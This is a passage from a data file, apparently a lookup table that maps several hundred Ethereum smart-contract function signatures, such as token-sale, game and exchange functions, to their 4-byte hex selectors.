"OWNERS_AND_PARTNERS_SUPPLY()": "0xd1c15acf", "TOTAL_TOKEN_CAP_OF_SALE()": "0xb1a2bbd1", "mainSaleTokenLocked()": "0xe78dd6f1", "ethFnkRate1()": "0x77dd8ea7", "howManyOwnersDecide()": "0x2f4a81df", "PLANET_PRICE()": "0x8631890e", "minMaintenanceMarginAmount()": "0xaf2bf027", "privateSell2Address()": "0x9aa9f27b", "startTimePre()": "0x1500c257", "isTradeable()": "0x1b4c84d2", "featuredSpritesLength()": "0xe118eda4", "addrExecutor()": "0x7883985b", "OPTION_POOL_PERIOD()": "0x1d87614a", "team_funds()": "0x01970c6b", "divBase()": "0xd077814b", "totalDowSold()": "0xdab4c65e", "getMessageCount()": "0x31933916", "maxCapInCents()": "0x29ea110c", "bonusSeed()": "0x5091c49e", "accountedTokenSales()": "0xbc129a98", "enableWithdraw()": "0x5b984ff6", "totalRequestsAmount()": "0x340e4fd5", "blackListEnabled()": "0xad37c41b", "lemonsDroppedToTheWorld()": "0x3a5ec2f8", "buyClimateCoinsAgainstEther()": "0xcb9756ad", "coordinatorAccountCount()": "0xd3bac6e3", "withdrawed()": "0x9a797128", "tokensOnHold()": "0x47803e97", "free_vote_for_candidate_A()": "0x10f5f6b6", "TOKEN_COMMUNITY()": "0xbd1fac00", "commissionBalance()": "0xdcf1a9ef", "maybeChangePrice()": "0x93af8ed4", "ProICOHardcap()": "0x26f59b8b", "team2Address()": "0x973ea9d5", "bounty_percent()": "0xb0d138e8", "nextCommonTTMTokenId7()": "0x36bffe1e", "dashboardAddress()": "0x0bcd87ed", "SEC_contract()": "0x98da2133", "tokenDestroy()": "0x3d662cff", "isMiBoodleToken()": "0x39774576", "airdropAllowed()": "0x03460f6c", "preSaleFinished()": "0x5569f5d0", "isARTDistributed()": "0xd3b3eccb", "isBonus()": "0x4358c156", "CROSAIR_MAX_PRICE()": "0xda6c5832", "checkVotingForChangeAdminAddress()": "0x0b779363", "MAX_MODULES()": "0x5f1e8c1b", "previousWeiBalance()": "0xc267e4b8", "getSMPTokensBoughtInICO()": "0xef589693", "tokenholder()": "0x84eba00c", "totalFunding()": "0xfe47a8a7", "dayAfterInMinutes()": "0x31809eac", "withdrawBoardMeetingFees()": "0xa2d5b8bf", "DEFROST_MONTHLY_PERCENT_OWNER()": "0x0547bf4d", "subowner()": "0xdfbd6150", "COIN_PER_ETHER_SUPPORT()": "0x298c1e14", "SUN()": "0x2dd395ae", "icoInstalled()": "0xafec91c4", "contributionPending()": "0x65e9cc4e", "currPicHash()": "0x086610d2", "currentVestedAmount()": "0x7588f82b", "partnersAddress()": "0x6a75f03d", "thirdChangeBlock()": "0x148dd101", "ethQuantity()": "0x74eb936b", "returnVesting()": "0x41470877", "isRatio()": "0xe3546ac5", "blockedUntil()": "0xa78db39c", "icoDiscountLevel2()": "0x7ba016d0", "saleTokensPerUnit()": "0xd30e268b", "icoStartedAt()": "0xad0c3dff", "bonusWindow3EndTime()": "0xead17f58", "tokenSaleCosts()": "0xada06dac", "endOfLockProjectToken()": "0xfb7e7456", "shopGloves()": "0x054a9f11", "RANGESTART_10()": "0x96984631", "PRICE_RATE_THIRD()": "0x83a9094f", "airdropGW()": "0xc55d34d4", "activeStage()": "0x4864d8d9", "STAGE_1_TIME()": "0x5d6470a4", "User_5()": "0xb55459d1", "EXPECTED_TOTAL_SUPPLY()": "0x9127d3d7", "isMarketManager()": "0x3eebc589", "foundationFundMultisig()": "0x6fd59b01", "capDefault()": "0x5a2e311b", "lastTimeGen0()": "0x8231ee98", "ico1Cap()": "0x5257c508", "basePunish()": "0x8ba45307", "webAddress()": "0xf1f6d945", "winningTeamIndex()": "0x612ed785", "coreSupply()": "0x0e1e3914", "getSaleFee()": "0xe51d2093", "takeExcess()": "0x619f5e72", "controllerFailed()": "0xd36b96a9", "calculatePlotPrice()": "0x5d0413d1", "earlyBirdMaxPerPerson()": "0x97dc4c6f", "totalTokensICO3()": "0x79d4fe00", "checkpointLevel()": "0x14b8e9a4", "minechain()": "0x49dd0fe3", "only6()": "0xa09107e1", "upgradeWeth(address)": "0xc6cdf77e", "getStockReleaseTime(address,uint256)": "0x133f8a2f", "getStockAmount(address,uint256)": "0x1c9cf54c", "getStockCount(address)": "0x408057c4", "getStockTotal(address)": "0x7e9e1637", "grantStock(address,uint256,uint256)": "0xb59d689f", "IPAYTOKEN()": "0x0125d7c8", "erc20BalanceForAddress(address)": "0xc69a8e13", "removeSmartContract(address)": "0x816036ae", "addSmartContracts(address[])": "0xea9c8e63", "addSmartContract(address)": "0x51838717", "Erc20SummaryLogic(address)": "0x79c7180d", "removeSmartContractByAddress(address)": "0x7434d180", "addSmartContractByAddress(address)": "0x533de9e5", "getSmartContractsLength()": "0x2e297a44", "getSmartContractByPosition(uint256)": "0xdbcc4658", "toggleContractAccessForEverybody()": "0xb0e8cba8", "toggleContractStopped()": "0xe83c78d4", "denyAccess(address,address)": "0xd2ef0669", "allowAccess(address,address)": "0xed3f1c87", "Accessible()": "0x50020560", "Erc20Test(string,string,uint8)": "0xc7e12723", "DLP()": "0xb41b208e", "GameAAAToken()": "0x9fd8914d", "getPlayerLaff(uint256)": "0x593a6297", "changeMyName(string)": "0xbf566599", "OCE()": "0x578de482", "canBeTransfered(address,uint256)": "0x97d425cb", "callExitFromUnknownContract(address)": "0xc5f913fe", "_reached(uint256)": "0x41c06b2a", "TokenSale(address)": "0x7ebd89ee", "SecuredNotes()": "0x55dac078", "getNoteByIndex(uint256)": "0x4c21fa45", "addNote(string)": "0xa4edff47", "setCharPrice(uint256)": "0x2e25aa96", "_isUserInGame(address)": "0x4905c5b0", "getCurrTotalInvest()": "0xa47ae542", "_getGameInfoPart3(address,uint256)": "0x74d76bc4", "getCurrGameInfoPart1()": "0x353f0e40", "getCurrGameInfoPart2()": "0x49055da2", "_auction(uint256,address)": "0x24b33f5d", "auction(address)": "0x38dea895", "getInvitor(address)": "0xb0c73bc6", "registerInvitor(address,address)": "0x32a21a28", "_inMoney(uint256,address)": "0x1af39907", "getPlayerWallet()": "0x12a916f9", "createRoom(uint256,uint256,string,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xbebeb73f", "award(uint256)": "0x0184e952", "isEmptyName(string)": "0x18b0efb6", "buyReply(uint256,uint256)": "0x274f97bb", "sellReply(uint256,uint256,uint256)": "0x52bd6945", "replayAnser(uint256,uint256[])": "0xdfc027ef", "replayAnserWithReferrer(uint256,uint256[],string)": "0x19404c2f", "getReplay(uint256,uint256)": "0xa35e83ea", "getReplyFee(uint256)": "0x677e2ef2", "getRoomIdxByNameElseLargest(string)": "0x58543fbd", "getInitInfo()": "0x7d443e57", "TestreplayAnser(uint256)": "0x8265d577", "testNow()": "0xdec04b9b", "createRoomQuick()": "0xcf2b3b47", "multiplies(uint256,uint256)": "0x9554fa12", "sendToWinner(uint16)": "0x202ece74", "sendToMarket(uint16)": "0x9e72a9d8", "transferFrom(uint40)": "0x4d39f535", "setTemp(uint40)": "0x87ea8581", "withdrawAdmin(uint40)": "0x49d24ae8", "addAuction(uint40,uint40,uint128,uint40)": "0xf41db329", "GetPlayerInfo()": "0x2e639fd5", "GetDayReward()": "0xda51f168", "CanSignIn()": "0x72a1a8ae", "IRB()": "0x90979943", "TokenATC(uint256,string,uint8,string)": "0x70f74228", "allBalances(address[],address)": "0x8b6e10ac", "depositLock(address)": "0xcc891023", "createCrowdsale(uint256,uint256,uint256,uint256,address,address,address,address)": "0x12f8b3db", "addIcoPurchaseInfo(uint256,uint256)": "0x9af32035", "addPreIcoPurchaseInfo(uint256,uint256)": "0xdd218ff2", "setIcoRate(uint256)": "0x1bf9b387", "setIcoThirdWeekRate(uint256)": "0xf671cae4", "setIcoSecondWeekRate(uint256)": "0xa9abe7be", "setIcoFirstWeekRate(uint256)": "0xc62c5fda", "setExchangeRatePreIco(uint256)": "0x95880360", "SetStartTimeIco(uint256)": "0x35181711", "SetStartVesting(uint256)": "0xf02694f6", "VeiagCrowdsale(uint256,uint256,uint256,uint256,address,address,address,address)": "0x663cebfc", "VeiagToken(address)": "0x91bbd6f6", "VocToken()": "0xb05a47d9", "createOpenLockAndDraw(address,address,uint256)": "0xd3140a65", "createOpenAndLock(address,address)": "0xeefe3818", "createAndOpen(address,address)": "0x581f3c50", "shut(address,bytes32,address)": "0x792037e3", "shut(address,bytes32)": "0xbc244c11", "wipeAndFree(address,bytes32,uint256,uint256,address)": "0x1b968160", "wipeAndFree(address,bytes32,uint256,uint256)": "0xfaed77ab", "lockAndDraw(address,uint256)": "0x516e9aec", "lockAndDraw(address,bytes32,uint256)": "0x1edf0c1e", "free(address,bytes32,uint256)": "0xf9ef04be", "wipe(address,bytes32,uint256)": "0xa3dc65a7", "ANKR()": "0x644a3d42", "setFirstMile(address,address)": "0xf79a2b84", "getClaimedAmount(uint256)": "0x429c6e5b", "getTotalAmount(uint256)": "0xf0e40662", "getNormalPayout(uint256)": "0xfcffb14e", "getOwnerPayout(uint256)": "0x41a1a582", "newFootballMatch(uint256)": "0xd5df7bcc", "SDOGE(uint256,string,uint8,string)": "0x347aa903", "IRideToken()": "0x4a980b49", "HexanCoin(uint256,string,uint8,string)": "0x952a9320", "iCASH()": "0x0a781bf4", "setMaxGift(uint256)": "0x2c7a8559", "BETSQUARE()": "0x39e5a487", "NAST()": "0xa4a33638", "setTeamFund()": "0xec3743f1", "transferDevelopment(address)": "0x4da837e3", "transferReferral(address)": "0x7114a96e", "shweta()": "0x5fa13b49", "updateBearCount(address)": "0x9da1bc7b", "updatePlayerEth(address,uint256,address)": "0xab400d86", "setInviteeCount(address,uint256)": "0xf4f61563", "setInviteeAccumulator(address,uint256)": "0x3c4b5e2b", "luckyOne(uint256)": "0x6ef1f3a6", "drawPorsche()": "0x924fdaf6", "drawBenz()": "0x9be50784", "drawMini()": "0x9a9f1304", "drawPhone()": "0x296b76bb", "createPorscheTicket(address,uint256)": "0x60bea672", "createBenzTicket(address,uint256)": "0x9032f1a9", "createMiniTicket(address,uint256)": "0xded1d0b8", "createTicket(address,uint256)": "0x29913150", "getAccumulator()": "0xff40807b", "getPrizes()": "0xec000bb5", "getPorscheByOwner(address)": "0x57329424", "getBenzByOwner(address)": "0x40c3198e", "getMiniByOwner(address)": "0x0ac2ffc5", "getTicketsByOwner(address)": "0x67aa23e2", "desposeBear(address)": "0xa13615a5", "invalidate(address,uint256)": "0x18cfa483", "setTeamByAddress(uint8,address)": "0x97aeb7ad", "_xx()": "0x8762d50b", "Exorbuxcom()": "0xb5e02e84", "TITANToken()": "0xa38320e6", "HavEtherToken(uint256,string,uint8,string)": "0x0c02159f", "Inerex(bytes32)": "0x7f4bf7d1", "TheHashSpeed()": "0x8b9801b0", "setPrices(address[],uint256[])": "0x4352fa9f", "setPriceStorageInternal(address,uint256)": "0x0bfa1191", "setPriceInternal(address,uint256)": "0x93808351", "setPrice(address,uint256)": "0x00e4768b", "_acceptAnchorAdmin()": "0xccb13cbd", "_setPendingAnchorAdmin(address)": "0x9964622c", "_setPendingAnchor(address,uint256)": "0xde9d0e85", "decreaseApproveAndCall(address,uint256,bytes)": "0xd216a47d", "increaseApproveAndCall(address,uint256,bytes)": "0x44e191fa", "DailyRoi()": "0x85a143f4", "AcceptsDailyRoi(address)": "0xc6d90e70", "changeAffiliate(address,uint256)": "0xc54397a4", "Accelerate(uint256)": "0xa4a3513c", "ResolveChips(uint32[])": "0xa46dfb45", "GetBoilersInfo()": "0x2eb9526e", "Create(uint256,uint256,uint256,uint256,bool)": "0x409e81a4", "GetExchangePoint(uint8)": "0x8055dbb5", "CollectChips(uint256)": "0x1900aabf", "IsBoilerValid(uint256)": "0xc260f681", "GetPermissionIdx(uint256)": "0x30c93307", "CreateChips(uint256,uint256,uint256,uint256,bool)": "0xc814864c", "GenChipsLevel(uint256,bool)": "0xade53c4e", "GenExtWeightList(uint256,uint256,uint256)": "0x6a48c04d", "GetMinCost(uint256,uint256,uint256)": "0x4090e696", "GenOutChipsNum(uint256,uint256,uint256)": "0x2b7e063e", "GenChipLevel_General(uint256,uint256,uint256)": "0x3ac19acf", "GenChipLevel_Extra(uint256,uint256,uint256)": "0x59c27917", "GenChipLevel_Special(uint256,uint256,uint256)": "0xcbd9597d", "GenChipIndex(uint256,uint8,uint256[],uint256[],uint256[])": "0x3150456e", "GetBoilerInfo(address,uint256)": "0x58fe54a1", "CollectChips(address,uint256)": "0xd1472046", "GenerateChips(address,uint256,uint256,uint32[])": "0x0616ae05", "IsBoilerExpire(address,uint256)": "0xb248e436", "IsBoilerValid(address,uint256)": "0x1d991ffe", "nexus()": "0xa3f5c1d2", "PLBToken()": "0xd35e48e6", "ketqua()": "0x9ca44515", "tinhtong(uint256,uint256)": "0x3c3d1385", "getDividends(bool,address)": "0xe8befc0d", "notZeroAndNotSender(address)": "0xac4d965c", "p_setGameDuration(uint256)": "0xd461518c", "p_setGamePaused(bool)": "0xaf77c473", "p_setMaxInvestment(uint256)": "0x6c4fe255", "p_setMinInvestment(uint256)": "0x3e156601", "p_setRefPercent(uint256,uint256)": "0xc72e6d03", "p_setInvestorFundPercent_out(uint256,uint256)": "0x61b3b8e3", "p_setDevPercent_out(uint256,uint256)": "0xfcca8949", "p_setInvestorFundPercent(uint256,uint256)": "0x12a49007", "p_setDevPercent(uint256,uint256)": "0xeac472bf", "p_setDevAddress(address)": "0x5ecff851", "p_setOwner(address)": "0x60979759", "investor_getMediumInfo(address)": "0xa51f3782", "investor_getShortInfo(address)": "0x043b743f", "investor_contains(address)": "0xbe5638ff", "localConst()": "0x52892baf", "test_fourValidEqUint(int256)": "0xb813d939", "test_fourInvalidEqUint(int256)": "0xd1d115ac", "test_threeValidEqUint(int256)": "0xa788aa07", "test_threeInvalidEqUint(int256)": "0xe8fe9473", "test_twoValidEqUint2()": "0x7b5ecb32", "test_twoValidEqUint(int256)": "0xa558410a", "test_oneValidEqUint3()": "0x25818751", "test_oneValidEqUint2()": "0x2f3a212e", "test_oneValidEqUint1()": "0x3c6251bd", "node_index(address)": "0x0f5ad969", "concat_nodes(address[])": "0x407489ff", "NodeManager(address[])": "0x33b19417", "createSyndicate(address,uint256,uint256,uint256,uint256)": "0x3daceda1", "TokenSyndicateFactory()": "0xe71bbf48", "IsThisInternal()": "0xdfd8d516", "IsThisExternal()": "0x57c508d3", "IsThisPrivate()": "0xa890d257", "IsThisPublic()": "0xb261ce9c", "VisibilityDemo()": "0x47c51f73", "quantityHeldInCustodyOfExchange(address)": "0x51fd2c69", "calcValuePerShare(uint256,uint256)": "0xc2710949", "calcNav(uint256,uint256)": "0x0a47185d", "calcUnclaimedFees(uint256)": "0x9478ba47", "calcGav()": "0x56cff99f", "Fund(address,string,address,uint256,uint256,address,address,address,address,address[],address[])": "0xf3ca5679", "getAction(bytes,uint256)": "0x8397a260", "getActionsCount(bytes)": "0x3b338da0", "execute(bytes)": "0x09c5eabe", "removeCounter(address,uint32)": "0x63a8b945", "addCounter(address,uint32)": "0x780c4a73", "counterFor(address)": "0x5d0b6774", "TestContractOne()": "0xf7f3da3b", "percent(uint256,uint256)": "0x42318e3d", "getTicket(address)": "0x4717dea9", "checkin()": "0xbaeb0718", "getLeftTickets()": "0x735a3326", "ShowTickets(uint256,uint256,uint256)": "0x3d6a9750", "ProjectToken(uint256,string,uint8,string)": "0x248e86e6", "getWeiForRefund()": "0xb21c2475", "getDiscountTrancheDiscount(uint8)": "0xbe9e4697", "getDiscountTrancheEnd(uint8)": "0xd9c52d27", "getCurrentDiscountTrancheIndex()": "0xf97b7390", "MockSale(address,bool,uint256,uint256,uint256,uint256,uint256,uint256[])": "0xf25a7815", "isSimple()": "0x52548946", "doCall(address,uint256,bytes4,bytes32[])": "0x68c92b51", "MDTCrowdsale(address)": "0xe7712a94", "transferDevship(address)": "0x383eea0e", "Devable()": "0xa54940b1", "emitSkillsSet(address,uint256,uint256,uint256)": "0x177d8ee4", "emitSkillCategoriesSet(address,uint256,uint256)": "0x5d15b46a", "emitSkillAreasSet(address,uint256)": "0x52782648", "_emitSkillsSet(address,uint256,uint256,uint256)": "0xa8df99a9", "_emitSkillCategoriesSet(address,uint256,uint256)": "0x6c543c08", "_emitSkillAreasSet(address,uint256)": "0xcaeb2e2c", "_setSkills(address,uint256,uint256,uint256)": "0x0c3499ca", "_setCategories(address,uint256,uint256)": "0xb171dee6", "_setAreas(address,uint256)": "0x2d5505b6", "_addCategory(address,uint256,uint256)": "0x5c45872e", "_addArea(address,uint256)": "0xce695d7f", "_setMany(address,uint256,uint256[],uint256[],bool)": "0xbeb7fd4e", "addMany(address,uint256,uint256[],uint256[])": "0xd5f72b2e", "setSkills(address,uint256,uint256,uint256)": "0xbffee609", "setCategories(address,uint256,uint256)": "0xa3922eac", "setAreas(address,uint256)": "0x8d5fa05c", "getUserSkills(address)": "0xd2886ebc", "getCategoryInfo(address,uint256,uint256)": "0x5d201596", "getAreaInfo(address,uint256)": "0x2984bc4d", "hello2()": "0x011afdd7", "checkProof(bytes32,bytes32[],uint256)": "0xe396da73", "disagree(bytes32,bytes32,bytes32[])": "0x7e2ac454", "select(bytes32,bytes32,bool)": "0xb56d3ccc", "upload(bytes32,bytes32,bytes32,bytes32)": "0xd5cc1d49", "post(bytes32,bytes32)": "0x4b944b9b", "getWinner(bytes32)": "0x1e5f9149", "Token(uint256,string,uint8,string,address)": "0x5003e4d1", "Vendor(bytes,uint256)": "0x3ec1d668", "testThrow_3_invalidOwner_accessRestrictionThrow()": "0x49f209af", "testThrow_2_invalidOwner_accessRestrictionThrow()": "0x861f8a52", "test_1_validOwner_accessRestriction()": "0xade5e07d", "test_0_validOwner_construction()": "0x61e88f9a", "attemptSomeMethod(address,uint256)": "0x06024287", "someMethod(uint256)": "0xa1848b61", "OwnedExample(address)": "0x8ea1ff21", "setRankDynamic(uint256)": "0x10348938", "getRankDynamic(uint256)": "0x6fa0bf39", "ArrayDemo()": "0x324298ff", "MintAuthority(int256,address)": "0x0469756a", "SecondBiathlonToken(address,address,string,string,uint256,address)": "0xab080aab", "enrollUser(address)": "0x6a9dc9a8", "getUsersLength()": "0x595b1a3e", "getPaymentsFor(address)": "0x30d65b72", "sumPayments()": "0x495c167f", "collectPayments()": "0xce072163", "payServiceProvider()": "0x00bbec1c", "Reddit(uint256,uint256,bytes,bytes)": "0x19bb3c3d", "transferERC223(address,uint256,bytes)": "0x03bad56e", "ERC223TokenMock(address,uint256)": "0x75ff0664", "getBetById(uint256)": "0x605c43de", "addBet(address)": "0xd6e38114", "setHomeAdv(uint256,string)": "0xa37fd390", "setHoldingPeriod(uint256)": "0xd148288f", "setGreyToken()": "0xad9ec17e", "setGreyGreenPrice(uint8)": "0x78f0161a", "setGreenToken()": "0x2187a833", "setGameAddress(address)": "0x711953ef", "setFundingGoal(uint256)": "0x576eac66", "setFrontend(address)": "0x69569a51", "setForward(bytes4,address)": "0x02aa274b", "setFee(uint256)": "0x69fe0e2d", "setFeeStructure(uint256,uint256,uint256)": "0xe5782fd5", "setExportFee(address,uint256)": "0xa4502cb8", "setExporterBank()": "0x87cc1e1c", "setExporter()": "0xb35893f3", "setExpiry(uint256)": "0x01cceb38", "setExecPrice(uint256)": "0xfe4a3ac9", "setExchangeToken()": "0xb56e1bca", "sete(address)": "0x74331be7", "setDVIP(address)": "0x6716a692", "setDoNotAutoRefundTo(bool)": "0x423e1298", "setDirectorNode(string)": "0x38eaf913", "setdirectorName(string)": "0xa1b7ae62", "setDirectorLock(uint256,uint256)": "0x172d8a30", "setDescription(string)": "0x90c3f38f", "setDelegate(address,bool)": "0x4a994eef", "setDataContract(address)": "0x03959bb7", "setDappOwner(bytes32,address)": "0xc52bd836", "setDAO(address)": "0xe73a914c", "setCycleLimit(uint256)": "0x986dcd4d", "setCosignerAddress(address)": "0x82fc49b8", "_setCosignerAddress(address)": "0x5e6ad49d", "setController(address)": "0x92eefe9b", "setContent(string,bytes32)": "0xfd6f5430", "setConfigUint(int256,bytes32,uint256)": "0xbc45d789", "setConfig(string,uint256)": "0x3e8f5b90", "setConfigBytes(bytes32,bytes32)": "0x810a882f", "setConfig(bytes32)": "0xe8a5282d", "setConfigBool(bytes32,bool)": "0x1e0c7ed4", "setConfigAddress(bytes32,address)": "0x4c2d71b3", "setCompany()": "0xa510f776", "setCoinageContract(address)": "0xf8bd526e", "setChainyURL(string)": "0xeef8e35f", "setCertifierDb(address)": "0x951b01c5", "setCapitol(uint256,uint256)": "0x8702735c", "setCallbackAddress(address)": "0x37881810", "set(bytes32,string,bytes32)": "0x47448e8a", "setBuilding(uint256,uint256)": "0x16ce8a69", "setBounty(address,string,uint256)": "0x23e9c216", "setBot(address)": "0x6b5caec4", "setBlackflag(uint256,bool)": "0x2ffda1e0", "setBlackFlagRequest(uint256,uint256)": "0xc1441172", "SetBigContract(address)": "0xcf09e6e1", "setBeneficiary(address)": "0x1c31f710", "setBannedCycles(uint256[])": "0x5c89c10d", "setBackendOwner(address)": "0x754dea40", "setBackend(address)": "0xda7fc24f", "setAuditor(address)": "0x9f203255", "setAsset(address)": "0xd0d552dd", "setARKowner(address)": "0x9fa5e5d5", "setAmbiAddress(address,bytes32)": "0x7948f523", "setAllowTransactions(bool)": "0xf8ec4bf2", "setAllowedAccount(address)": "0x7a837213", "setAlliesContract(address)": "0x058d7433", "setAdv(uint256,string,string)": "0xf8af9e6f", "setAdministrator(address,string,bool)": "0x5d96ec65", "setAddr(string,address)": "0x213b9eb8", "set(int256,address,uint256)": "0x3c84f868", "setAddress(bytes32,string,address)": "0xf6d339e4", "setAccountFrozenStatus(address,bool)": "0x5e03d393", "setAccountAllowance(address,address,uint256)": "0x7eff1465", "serverSeed(address,bytes32)": "0x03750d94", "sendToOwner()": "0x6620a935", "sendToAggregation(uint256)": "0xbf8fc670", "sendReward(uint256,uint256)": "0x76d438b0", "sendMsg(address,string)": "0x7b02b2c9", "sendIfNotForked()": "0x9c6034a7", "SendETH(address)": "0x3a314b24", "SendETC(address)": "0xbb6b4619", "SendEmail(string,string)": "0xb1d05422", "sendEarnings(address)": "0x78ec81a0", "sendCryptedHand(bytes32)": "0x010731c0", "SendCashForHardwareReturn()": "0x9894221a", "sendBounty(bytes32)": "0xb938bf42", "sendBitcoin(string,uint256)": "0xeb455dc6", "sendBalance(address)": "0x5292af1f", "sendBack()": "0xd1e15045", "sendApproval(address,uint256,address)": "0x3d21aa42", "SendAllMoney()": "0x35d13969", "send(address)": "0x3e58c58c", "send(address[],uint256[],uint256)": "0xd6006e88", "Send1Get2()": "0x227185d6", "sell(uint256)": "0xe4849b32", "SellTokens()": "0xddb5b3ac", "sellKissBTCWithCallback(uint256,address,uint256)": "0x41524433", "sellKissBTC(uint256)": "0x2d592a34", "seller_accept()": "0x514dcfe3", "self_store()": "0x2aa3177a", "selfDestruct()": "0x9cb8a26a", "selectWinner(bytes32)": "0x6be505f5", "seizeTokens(address,uint256)": "0x88b9e10e", "adjustBalanceCheckpoints(address)": "0xc2ff7a38", "adjustTotalSupplyCheckpoints()": "0x4d242bbc", "pruneInvestors(uint256,uint256)": "0xc5bac421", "adjustInvestorCount(address,address,uint256)": "0x0aa24f50", "changeGranularity(uint256)": "0x210a8d0e", "updateTokenDetails(string)": "0x73826a93", "changeModuleBudget(uint8,uint8,uint256)": "0x5fcc6277", "withdrawPoly(uint256)": "0xf8a4cc33", "removeModule(uint8,uint8)": "0x1b2ae899", "_addModule(address,bytes,uint256,uint256)": "0x6895adbb", "addModule(address,bytes,uint256,uint256)": "0xf5efbd2d", "updateFromRegistry()": "0xf433262f", "changeAddress(string,address)": "0xa7dbb402", "getDelegateDetails(address)": "0x6c5aaf50", "changePermission(address,address,bytes32,bool)": "0xdec7542f", "verifyTransfer(address,address,uint256,bool)": "0x7915c9e0", "getTagByModuleType(uint8)": "0x56196dc9", "registerModule(address)": "0xad64ae4b", "useModule(address)": "0xdc659907", "ETHERanate()": "0x39cfc56a", "NAEC()": "0x867e958f", "balanceOfContract(address,address,address)": "0xf0c413dd", "withdraw(address,address,address)": "0xff7885e8", "userComment(uint256)": "0x69db054c", "blackList(address)": "0x4838d165", "comment(uint256,bytes32,bytes32)": "0x61ed373b", "userRound(address,uint256)": "0xb90e6bd8", "userRounds(address)": "0x43d0ee54", "roundStats(uint256)": "0x259d33c1", "disbandTo(address)": "0xd41097e3", "approveDisband()": "0x3bf2b4cd", "realtransfer(address[],uint256[])": "0x576077e2", "transfer2(uint256,address[],uint256[],bytes,bytes,bytes,bytes)": "0x8f08a60a", "transfer(uint256,address[],uint256[],uint256[3],bytes,bytes,bytes)": "0x91f34dbd", "getsum(uint256[])": "0x52af89af", "changeAllCosigners2(uint256,address[],bytes,bytes,bytes,bytes)": "0x1305d2de", "changeAllCosigners(uint256,address[],uint256[3],bytes,bytes,bytes)": "0xa0175b96", "assignOwner(address[],uint256,address)": "0xde41e1a1", "TeambrellaWallet()": "0x0278fa20", "toBytes(address[])": "0xab489f08", "toBytes(uint256[])": "0x4c2324bb", "checkSignatures2(bytes32,bytes,bytes,bytes)": "0x18c306bd", "checkSignatures(bytes32,uint256[3],bytes,bytes,bytes)": "0x19739117", "HcoinToken()": "0x1e4bb033", "RobotChain()": "0xd8047a07", "NewQuiz(string,bytes32)": "0x26e33670", "StopQuiz()": "0x63e3fbbd", "StartQuiz(string,string)": "0x04858fef", "BXZToken()": "0xec941ef8", "HMCToken()": "0x83db8e31", "getCP(address)": "0x6f0ac394", "canCPCreateInFactory(address,address)": "0xcb7b4ad4", "amountOfBSTRequired(address)": "0x0faa2aae", "hasEnoughBST(address,address,address)": "0xc5e8b864", "isBS(address)": "0x653c9eea", "getFactoryForCountry(string)": "0x5658d212", "changePrestige(address)": "0xd44512e3", "changeFees(uint256,uint256,uint256,uint256)": "0x650c4226", "addToWhitelist(address,address[])": "0xe559afd9", "changeBSTRequirement(address,uint256)": "0xeea8c4da", "addNoFeeAddress(address[],address[])": "0xd270085e", "removeCP(address,address)": "0x79ce0515", "addFactoryToCP(address,address)": "0xeffda074", "createCP(address,string,string)": "0xe760da9d", "addMemberToBS(address)": "0xb8aa4da8", "addFactory(string,address)": "0xc107e109", "_forwardPoly(address,address,uint256)": "0x606a9584", "_check(uint8)": "0xf871cca9", "_processTx(address,uint256)": "0x0a7f734e", "getSTODetails()": "0x1040dc27", "buyTokensWithPoly(uint256)": "0xcb752679", "configure(uint256,uint256,uint256,uint256,uint8,address)": "0x9f5a851f", "reclaimERC20(address)": "0x8905fd4f", "unpause(uint256)": "0xfabc1cbc", "getNumberInvestors()": "0x38c59de9", "getRaisedPOLY()": "0xa3fb8f15", "getRaisedEther()": "0x35ff3a51", "verifyInvestment(address,uint256)": "0xa412f87c", "getPermissions()": "0xc3a07df6", "getInitFunction()": "0x1613ec9d", "changeFactorySubscriptionFee(uint256)": "0x3ae192bd", "changeFactoryUsageFee(uint256)": "0xaac67b05", "changeFactorySetupFee(uint256)": "0x58a191c3", "getTags()": "0x995d9ab7", "getInstructions()": "0xe0d54970", "createCheckpoint()": "0xff0b9c90", "balanceOfAt(address,uint256,int256)": "0x12cf0ec8", "totalSupplyAt(uint256,int256)": "0x2cf5346a", "getModuleByName(uint8,bytes32)": "0x9f45b45c", "getModule(uint8,uint256)": "0x46b65ffd", "checkPermission(address,address,bytes32)": "0x8658b8b9", "verifyTransfer(address,address,uint256)": "0x9a4b1d5c", "OverseasReturneesToken()": "0x3b6cbaeb", "BECToken(uint256,string,string)": "0xa8418d01", "setNextRndTime(uint32,uint32,uint32)": "0x960491d7", "BirthdayBoyClickHere()": "0x5fc93ed7", "iflea()": "0x1a5dbe98", "getUserVote(address)": "0xd4923d4e", "getVoteItemDetails(uint256)": "0x1fe4ee7f", "getVotesForItem(uint256)": "0x182ae5f2", "buyShares(bytes32,uint8,uint256,uint256)": "0xbbd4f854", "getShareDistributionWithTimestamp(bytes32)": "0xa0bde7e8", "getShareDistribution(bytes32)": "0x929e626e", "calcMarketFee(bytes32,uint256)": "0x6da84ec0", "getMarketHashes(bytes32[])": "0x674cc1f5", "getMarkets(bytes32[],address)": "0x5aa97eeb", "shortSellShares(bytes32,uint8,uint256,uint256)": "0x16181bb7", "closeMarket(bytes32)": "0x031d973e", "newEntry(int256,bool,uint256,int256,string,bytes32,address,uint256[])": "0x8f9df278", "entries(int256)": "0x5829d310", "addOrder(uint256,uint256,uint256,uint256,uint256,uint8)": "0xfcc11241", "claimLiquidityReward()": "0xd3f297d6", "getClosedCandidates()": "0xc67d376d", "reduceOrderQty(uint256,uint256)": "0xa9eed530", "getRewardTable()": "0x942b90d3", "lastClaimedBlock()": "0x27cca148", "getRewardAmount()": "0x09a69f57", "getOpenCandidates()": "0x09405164", "updateRewardDuration(uint256)": "0x070a888f", "closeOrder(uint256)": "0x069d6d1c", "balanceOfAll(address)": "0xfe992c98", "unsetCoordinator()": "0xf1e4a540", "addNewTokens(uint256)": "0xe71264fa", "cancelOrder(uint256,uint256)": "0xb6ed0632", "dexWithdrawCollectedFees()": "0xa2f16d80", "depositEther()": "0x98ea5fca", "takeOrder(uint256,uint256,uint256,uint256)": "0x9824425a", "setCoordinator(address)": "0x8ea98117", "orderBookLength()": "0x512f1e64", "withdrawToken(uint256)": "0x50baa622", "withdrawEther(uint256)": "0x3bed33ce", "getAskOrderBookStats()": "0x29ef56b1", "placeOrder(uint256,uint256,uint256)": "0x0e97cfdf", "RewardOrder(uint256,uint256)": "0x0e0f55d0", "getOrderBook(uint256,uint256)": "0x08bf2d0d", "eventOracles(bytes,uint256)": "0xffcf21a9", "getFee(bytes)": "0x8204ecdd", "setOutcome(bytes,bytes)": "0xc2038560", "ultimateOutcomes(bytes)": "0xc0ae6a3a", "registerEvent(bytes)": "0xc90d080a", 